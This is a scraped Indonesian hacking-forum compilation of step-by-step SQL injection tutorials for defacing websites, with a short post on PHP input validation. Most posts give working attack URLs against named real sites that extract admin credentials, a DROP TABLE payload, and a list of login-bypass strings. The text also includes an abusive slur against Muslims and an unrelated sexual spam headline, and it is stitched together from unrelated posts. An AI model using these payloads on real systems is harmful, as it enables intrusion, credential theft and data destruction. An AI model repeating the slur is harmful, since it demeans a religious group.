You are on page 1of 12

Hack Deface website bagaimana cara

mendeface website ?
kebetulan banget ne,aku juga lagi pengen bisa belajar sql injection,mas DOS bagi bagi
ilmunya dong.

Nie aku ada dikit dasr buat di baca baca ,sekalian aku mau minta saran dari sang master
deface di hc ini.

1.Cari target
ex http://www.kaskus.us/shop.php?id=96
2.cari tau ada bugs or ga
cara : tambahin ' di akhir uid
http://www.kaskus.us/shop.php?id=96'
kalo ada pesan erornya,berarti tuh ada bugsnya,n siap kita oprek.
3.hitung field di databasenya
cara : tambahin +order+by+nominal/*
contoh :http://www.kaskus.us/shop.php?id=96+order+by+14/*
keterangan
Dasar guoooooblok orang islam gua aja minoritas mampu membuat website
kaskus.us!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
disini kita main tebak tebakan.Kira2 ada berapa field di databesnya.Kita isi aja
nominalnya dari 1 sampai ada pesan erornya.pada contoh di atas jumlah koolomnya ada
14,berarti pada nominal ke 14 pesan erornya tidak ada,and pada nominal 15 ada pesan
erornya.

4.Sekarangh kita cari magic numbernya


cara : abis uid kita tambah +union+select+nominal jumlah kolom
contoh
http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,6,7,8,9,10,11,1
2,13,14/*

liat angka berapa yg nongol.dalam contoh ini yg kluar angka 6

5.sekarang kita liat versinya {ada yg bilang klo bagian ini ga penting banget}
cara : maggic number yg kluar tadi kita ganti dengan
concat_ws(user(),0x3a,database(),0x3a,version()).pada contoh diatas adalah angka 6

contoh http://www.kaskus.us/shop.php?id=989 union


select1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/*

6.keluarin tablenya
cara kita tambahkan +from+information_schema.tables/* setelah angka terakhir

contoh http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,
3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables

ups ga isa...akalin ah.gimana kalo ditambahin lagi menjadi <pizzy>


http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,
3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tables+whe
re+table_schema=database()+limit+0,1/*/*

gunanya apa itu sie???? hehehe aku juga ga ngerti,pas aku nyoba n gagal aku konsul ma
temen,n kata dia suruh nambah itu di belakanganya,walhasil bisa kalian liat.

7.saatnya cari kolom

cara sama kaya cara diatas,cuman tabel ganti sama column aja

8.cari user name n pass nya

nah buat yg satu ini aku belom pamah bener jadi ga berani aku tulis,soalnya aku juga
masih mumet,pernah nyoba,pernah sukses,pernah gagal.

cuman buat kasus yg ini,contoh ini aku udah tau kelanjutanya,soalnya di bantu temen pas
bagian ininya.
akhir dari cerita ini{cieeee} akan berujung di
http://www.kaskus.us/shop.php?id=989+union+select+1,2,3,4,5,
concat(Username,0x3a,Password),7,8,9,10,11,12,13,14%20from%20admin_eq/*

buat master2 deface hc,mohon cara yg aku pake ini di sempurnakan dong,aku banyak
yang salah tuh.nyatanya dari 4 target yg aku coba,tiap target ga bisa di selesaikan dengan
satu cara.

Mksdnya,dalam cari bugs,cari table,cari magic number,aku selalu pake cara yg beda.Aku
dapet berbagai cara dalam deface web,bukanya bikin aku jadi tambah mudeng,malah ajdi
tambah pusing aku,pusing milih,mana sie tutor yg bener,masa caranya beda beda.??????

buat yg ikut jalan ku,nyoba cara yg ini,n sukses,post ya,bagi yg gagal juga post,gagalnya
dimana,biar mas DOS yg nanganin.Wkwkwkwkwkwk

kan beliau yang lebih ahli....Pisss mas DOS....

_________________
Rasa ingin tau adalah motivasi yang sangat bagus.

Back to top
Display posts from previous: All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1
Year Oldest FirstNewest First

All times are GMT + 7 Hours


Seksinya aminah pekerja rumah sakit tangerang

Tips Sederhana Mengantisipasi XSS dan SQL Inject Pada PHP (Database MySQL)
buat yang belum tau XSS dan sql injek silakan cari d google,jangan malas..

hadu.. banyak bertebaran d luar sana tekhnik2 hacking XSS maupun Sql injek,trus
antisipasina gmn donk?

gue cuma share sederhana doank, tapi…….

disini saya memperkecil keadaan saja ,selanjutnya explorasikan dengan search


engine lainnya..

1. Gunakan wrapper untuk eksekusi sql (file disertakan)


2. Gunakan validasi POST dan GET variable sebelum dieksekusi dengan SQL
command
3. Replace POST dan GET variable yang berisi karakter-karakter yang bisa
mengacaukan SQL (database) sebelum dieksekusi dengan SQL command.

contoh kita punya tabel:

CREATE TABLE gbook ( id int(11) NOT NULL auto_increment, name varchar(15)


default NULL, komen varchar(text), PRIMARY KEY (id) ) TYPE=MyISAM;

Untuk view content dgn id = 3, biasanya kita tulis pada browser seperti berikut ini.

http://blablablablala.com/index.php?action=view&id=3

Untuk memahami nya, mari kita pilah2 dulu url tadi.

– action=view, adalah variabel $_GET dengan key = action dan value = view yang
akan mengeksekusi fungsi viewContent()
– id =1, adalah variabel $_GET dengan key = id dan value = 1 yang akan dieksekusi
dalam SQL command.

OK, sekarang penulis akan berikan file-file untuk mencoba kasus di atas, ada tiga
file yaitu seperti yang terlihat di bawah ini.

- config.php, merupakan file yang berisi konfigurasi database yang bisa Anda set
sesuai pada komputer kamu.
- classdb.php, merupakan file yang berisi operasi terhadap database (MySQL) -
index.php, merupakan file utama yang akan dijalankan nantinya.

now.. kita coba dengan ini

http://index.php?action=view&id=’1

eng ing keluarnya adalah = Bad Request


Jadi kesimpulannya SQL injection dan XSS bisa diantisipasi hanya dengan
ketelitian dalam programming. Itu aja sih kayaknya

credit by kemangi.. . .

+rep plzz. . . .hehehe

--------------------------------------------------------------------------------

7371756174746572372070616C696E672067616E74656E67

9 Feb 2009 12:44

d4Ld0L
Letkol

Posts: 2.718
Joined: Sep 2008
Reputation: 52
Thanks 13 x di 12 post Post: #2RE: Tips Sederhana Mengantisipasi XSS dan SQL
Inject Pada PHP (Database MySQL)

kayknya lebih seru pake sql injection ..

9 Feb 2009 12:49

squatter7
Mayor

Posts: 1.727
Joined: Dec 2008
Reputation: 41
Thanks 38 x di 36 post Post: #3SQL injection (basic)

neh cuma sdkit pengetahuan dasar SQL injection buat pemula seperti SAYA. . .jadi
maap klo ada yg salah. . .maklum gag isa apa"
jd buat para master" mohon tambahan nya
ada beberapa tahap yg harus di lakukan untuk melakukan serangan SQL inejction
berikut adalah cara-caranya :

- pertama mencari site yg vuln terhadap sql inecjtion tentunya. bagaimana kita tahu
site tersebut vuln ?? site yg vuln bisa di coba/test dengan cara menambahkan tanda
petik tunggal (') pada akhir URL site yg kita coba serang. sebagai contoh saya
menggunakan site http://www.sman2bdg.or.id sebagai target
- langkah kedua adalah pengetesan apakah site tersebut vuln sql injection atau
tidak dengan cara menambahkan single quote (') pada akhir URL. target kita
adalah sman2bdg.or.id, carilah url di situs tersebut yg vuln akan sql injection
seperti contoh berikut http://www.kaskus.usindex.php?x=06&id=225

lalu tambahkan single quote di belakang url hinga di dapat URL seperti ini
http://www.kaskus.usindex.php?x=06&id=225' lihat dengan teliti apa yg terjadi
dengan situs itu ?? ya error terjadi pada situs itu seperti pada gambar di bawah ini

itu menandakan situs tersebut vuln terhadap sql injection, cheers .


- langkah selanjutnya adalah memeriksa jumlah kolom yg ada. untuk mencari
jumlah kolom yg ada di gunakan syntax "order by" orderlah sampai kondisi false
(error seperti diatas) tercapai dimulai dari order by 1
http://www.kaskus.usindex.php?x=06&id=225 order by 1-- jika belum terjadi error
pada order by 1-- maka lanjutkan dengan order by 2-- dan selanjutnya sampai
error terjadi lagi dalam contoh ini error terjadi pada order by 11--.
- langkah ke 4 adalah mencari hole pada jumlah kolom yg terdapat di situs tersebut
dengan syntax "union select". lakukan union select dengan jumlah kolom adalah 10
kenapa 10 ?? karena setelah kita lakukan order pada langkah sebelumnya terdapat
error pada kolom 11 maka lakukan union pada kolom 10 (tidak ada error)
http://www.kaskus.usindex.php?x=06&id=-225 union select 1,2,3,4,5,6,7,8,9,10--.
setelah di union tadi maka akan muncul angka-angka yg mana pada angka tersebut
kita bisa masukan perintah untuk mencari tau versi dari my sql yg di gunakan.

pada gambar di atas terlihat angka 2,3, dan 5.


- langkah selanjutnya adalah mencari tau versi mysql yg di gunakan. untuk mencari
tau versi yg di gunakan syntaxnya adalah vesion() masukan syntax untuk mencari
version ke adalam angka yg tadi saat error muncul seperti berikut
http://www.kaskus.usindex.php?x=06&id=-225 union select
1,version(),3,4,5,6,7,8,9,10-- sampai langkah ini kita sudah mengetahui versi mysql
yg di gunakan situs tersebut dalam hal ini versi 5 beruntung lah kita karena versi 5
lebih mudah pengerjaanya di banding versi 4 atau 3
- sekarang kita akan mencari tau nama nama tabel yg tersedia dengan
menggunakan syntax table_name from information_schema.tables-- masukan
syntax tersebut di angka ajaib seperti ini
http://www.kaskus.usindex.php?x=06&id=-225 union select
1,table_name,3,4,5,6,7,8,9,10 from information_schema.tables-- maka akan muncul
nama nama table yg exist di situs tersebut. carilah nama table yg bisa memberikan
kita previladge untuk mengedit isi situs (jika berminat ) misal admin,user, atau
login, etc.
- jika sudah tau nama table yg berguna maka tahap kita hanya tinggal beberapa
langkah lagi dan selanjutnya adalah mencari tau nama kolom yg ada dari table yg
memberikan hak akses tadi (admin atau user) dengan menggunakan perintah
column_name from information_schema.columns where table_name=(hexadecimal
dari nama table admin)-- dalam hal ini saya mengambil table ADMIN.
http://www.kaskus.usindex.php?x=06&id=-225 union select
1,column_name,3,4,5,6,7,8,9,10 from information_schema.columns where
table_name=0x41444d494e--. hohoho muncul lah nama nama table yg kita cari =P~
mantapppp

- langkah terakhir adalah mencari nilai nilai dari kolom yg tersedia pada table
admin lakukan dengan concat

spoiler
http://www.kaskus.usindex.php?x=06&id=-
225%20union%20select%201,concat(ID_USER,0x3a,NAMA,0x3a,TANGGAL,0x3a
,PASSWORD,0x3a,EMAIL),
3,4,5,6,7,8,9,10%20from%20ADMIN-- 0x3a

adalah nilai hexadecimal dari semicolon (. horeee password sama usernamenya


keluar tapi kita masih harus medecrypt password yg berbentuk hash md5 untuk
mendecryptnya bisa di gunakan cain and able ataupun crack online yg bisa di cari
di google

ini hanya sebagai pembelajaran segala resiko ada di tangan anda yg


memperaktekan

credit by r3dwood

seperti biasa + rep

--------------------------------------------------------------------------------

Re: Deface Website


by opelgaring on Thu Jan 29, 2009 5:32 am

Gi bahas deface apa sql injection?


Bagi ilmu orang ahhhhhh.....
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL
statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan
MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5
dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada
table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut
:
select id, user_name,password from user where name = 'echo' and
password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan
ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL
atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan
kosong deh tuh loginya
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and
password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas kita
langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari
login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja
deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa
melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam
addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit
tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source
HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
<FORM action=http://victim/admin/login.asp method=post>
<input type=hidden name=A value="test' or 1=1--">
</FORM>
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan
password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .

Variable ' or 1=1--


Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat
penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan
untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan
pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya
menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong)
yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang
mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda --
merupakan
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada
login page
Kita bisa masuk kedalam login page tanpa password dan user name :d.
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote
execution dengan sql Injection
dan untuk artikel akan dimasukan dalam ezine 3 echo.or.id .Semoga artikel ini
berguna .
-----------------------------------------------------------------------------------------------------------
------------
Sumber Baca : http://securityfocus.com/articles/SQLin ... torial.php
http://www.securiteam.com/securityreviewskalo ada kekurangan, itu semata-mata
dari saya
kalo ada kebenaran, itu semata-mata dari PENGUASA ILMU

You might also like